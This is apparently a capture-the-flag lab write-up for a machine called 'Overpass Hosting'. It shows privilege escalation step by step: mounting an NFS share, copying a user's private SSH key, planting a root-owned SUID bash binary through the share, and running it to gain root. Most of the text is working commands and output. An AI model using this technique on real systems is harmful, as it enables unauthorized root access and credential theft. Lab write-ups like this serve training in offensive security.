Overpass HOSTING
Exploitation
- Mounting the
NFSShare
[attacker@machine ~]$ mkdir /mnt/NFS
[attacker@machine ~]$ mount -t nfs localhost:/ /mnt/NFS -o nolock
- Copying the
Private SSH Key
[attacker@machine NFS]$ cd /mnt/NFS
[attacker@machine NFS]$ ls -l
...
.ssh
...
[attacker@machine NFS]$ cp .ssh/id_rsa /home/virtualbox
- Copying BASH Binary from our System to the
NFSShare and Setting SUID Permissions on it.
[attacker@machine NFS]$ cp /bin/bash . && chown root:root bash && chmod 4777 bash
[attacker@machine NFS]$ ls -l
...
-rwsrwxrwx 1 virtualbox virtualbox 1190928 7 ott 23.58 bash
...
- Using the
Private SSH Keyto login as the Userjamesand run the BASH Binary that we copied to the Target Machine with the SUID Bit set.
[james@ip-10-10-109-248 ~]$ id
uid=1000(james) gid=1000(james) groups=1000(james)
[james@ip-10-10-109-248 ~]$ ls -l
total 1192
-rwsrwxrwx 1 root root 1219248 Oct 7 11:37 bash
[james@ip-10-10-109-248 ~]$ ./bash -p
[james@ip-10-10-109-248 ~]$ id
uid=1000(james) gid=1000(james) euid=0(root) groups=1000(james)
[james@ip-10-10-109-248 ~]$ whoami
root